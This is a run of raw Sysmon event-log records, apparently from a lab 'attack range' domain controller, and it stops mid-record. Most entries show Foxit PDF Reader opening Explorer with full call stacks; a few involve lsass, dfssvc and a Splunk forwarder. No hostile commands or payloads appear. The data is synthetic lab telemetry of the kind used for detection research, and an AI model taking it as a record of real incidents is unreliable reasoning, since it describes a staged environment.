07 10341000x800000000000000040395Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.572{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1301b1(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\System32\SHELL32.dll+109200(wow64)|C:\Windows\System32\SHELL32.dll+109136(wow64)|C:\Windows\System32\SHELL32.dll+1092c2(wow64)|C:\Windows\system32\explorerframe.dll+4b1ba(wow64)|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+d30a(wow64) 10341000x800000000000000040394Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.572{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+13012a(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\System32\SHELL32.dll+109200(wow64)|C:\Windows\System32\SHELL32.dll+109136(wow64)|C:\Windows\System32\SHELL32.dll+1092c2(wow64)|C:\Windows\system32\explorerframe.dll+4b1ba(wow64)|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+d30a(wow64) 10341000x800000000000000040393Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.572{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+130113(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\System32\SHELL32.dll+109200(wow64)|C:\Windows\System32\SHELL32.dll+109136(wow64) 10341000x800000000000000040392Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.572{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+130113(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\System32\SHELL32.dll+109200(wow64)|C:\Windows\System32\SHELL32.dll+109136(wow64)|C:\Windows\System32\SHELL32.dll+1092c2(wow64) 10341000x800000000000000040391Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.432{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEFEAE5)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+11214|C:\Windows\System32\wow64win.dll+31ed0|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+363dd|C:\Windows\SYSTEM32\ntdll.dll+a9834|C:\Windows\System32\wow64win.dll+f534|C:\Windows\System32\wow64win.dll+4e07 10341000x800000000000000040390Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.432{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEFEAE5)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+11214|C:\Windows\System32\wow64win.dll+31ed0|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+363dd|C:\Windows\SYSTEM32\ntdll.dll+a9834|C:\Windows\System32\wow64win.dll+f534|C:\Windows\System32\wow64win.dll+4e07 10341000x800000000000000040389Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.432{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEFEAE5)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+11214|C:\Windows\System32\wow64win.dll+31ed0|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+363dd|C:\Windows\SYSTEM32\ntdll.dll+a9834|C:\Windows\System32\wow64win.dll+f534|C:\Windows\System32\wow64win.dll+4e07 10341000x800000000000000040388Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.432{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEFEAE5)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+11214|C:\Windows\System32\wow64win.dll+31ed0|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+363dd|C:\Windows\SYSTEM32\ntdll.dll+a9834|C:\Windows\System32\wow64win.dll+f534|C:\Windows\System32\wow64win.dll+4e07 10341000x800000000000000040387Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.432{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEFEAE5)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+11214|C:\Windows\System32\wow64win.dll+31ed0|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+363dd|C:\Windows\SYSTEM32\ntdll.dll+a9834|C:\Windows\System32\wow64win.dll+f534|C:\Windows\System32\wow64win.dll+4e07 10341000x800000000000000040386Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.432{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEFEAE5)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+11214|C:\Windows\System32\wow64win.dll+31ed0|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+363dd|C:\Windows\SYSTEM32\ntdll.dll+a9834|C:\Windows\System32\wow64win.dll+f534|C:\Windows\System32\wow64win.dll+4e07 10341000x800000000000000040385Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.416{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3BA2)|UNKNOWN(FFFFF3D9DFEB649B)|UNKNOWN(FFFFF3D9DFEA37BC)|UNKNOWN(FFFFF3D9DFE6296B)|UNKNOWN(FFFFF3D9DFE628D6)|UNKNOWN(FFFFF3D9DFE627E7)|UNKNOWN(FFFFF3D9DFE627CE)|UNKNOWN(FFFFF3D9DFE61EB8)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f934|C:\Windows\System32\wow64win.dll+b9cf|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87 10341000x800000000000000040384Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.416{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3BA2)|UNKNOWN(FFFFF3D9DFEB649B)|UNKNOWN(FFFFF3D9DFEA37BC)|UNKNOWN(FFFFF3D9DFE6296B)|UNKNOWN(FFFFF3D9DFE628D6)|UNKNOWN(FFFFF3D9DFE627E7)|UNKNOWN(FFFFF3D9DFE627CE)|UNKNOWN(FFFFF3D9DFE61EB8)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f934|C:\Windows\System32\wow64win.dll+b9cf|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87 10341000x800000000000000040383Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.416{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3BA2)|UNKNOWN(FFFFF3D9DFEB649B)|UNKNOWN(FFFFF3D9DFEA37BC)|UNKNOWN(FFFFF3D9DFE6296B)|UNKNOWN(FFFFF3D9DFE628D6)|UNKNOWN(FFFFF3D9DFE627E7)|UNKNOWN(FFFFF3D9DFE627CE)|UNKNOWN(FFFFF3D9DFE61EB8)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f934|C:\Windows\System32\wow64win.dll+b9cf|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87 10341000x800000000000000040382Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.416{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3BA2)|UNKNOWN(FFFFF3D9DFEB649B)|UNKNOWN(FFFFF3D9DFEA37BC)|UNKNOWN(FFFFF3D9DFE6296B)|UNKNOWN(FFFFF3D9DFE628D6)|UNKNOWN(FFFFF3D9DFE627E7)|UNKNOWN(FFFFF3D9DFE627CE)|UNKNOWN(FFFFF3D9DFE61EB8)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f934|C:\Windows\System32\wow64win.dll+b9cf|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87 23542300x800000000000000040381Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.385{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C133A33C83F4F1594FCA4306FAB4A568,SHA256=8D6632284EF7E7C428609703C485BA4660D8E0C3AD74CBBCCC99783E0A165020,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000040380Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.354{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000040379Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.354{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\System32\dfssvc.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x800000000000000040378Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.338{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040377Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.338{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040376Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.338{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3BA2)|UNKNOWN(FFFFF3D9DFEB649B)|UNKNOWN(FFFFF3D9DFEA37BC)|UNKNOWN(FFFFF3D9DFE6296B)|UNKNOWN(FFFFF3D9DFE628D6)|UNKNOWN(FFFFF3D9DFE627E7)|UNKNOWN(FFFFF3D9DFE627CE)|UNKNOWN(FFFFF3D9DFE61EB8)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f934|C:\Windows\System32\wow64win.dll+b9cf|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87 10341000x800000000000000040375Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.338{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3BA2)|UNKNOWN(FFFFF3D9DFEB649B)|UNKNOWN(FFFFF3D9DFEA37BC)|UNKNOWN(FFFFF3D9DFE6296B)|UNKNOWN(FFFFF3D9DFE628D6)|UNKNOWN(FFFFF3D9DFE627E7)|UNKNOWN(FFFFF3D9DFE627CE)|UNKNOWN(FFFFF3D9DFE61EB8)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+f934|C:\Windows\System32\wow64win.dll+b9cf|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87 10341000x800000000000000040374Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.338{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF 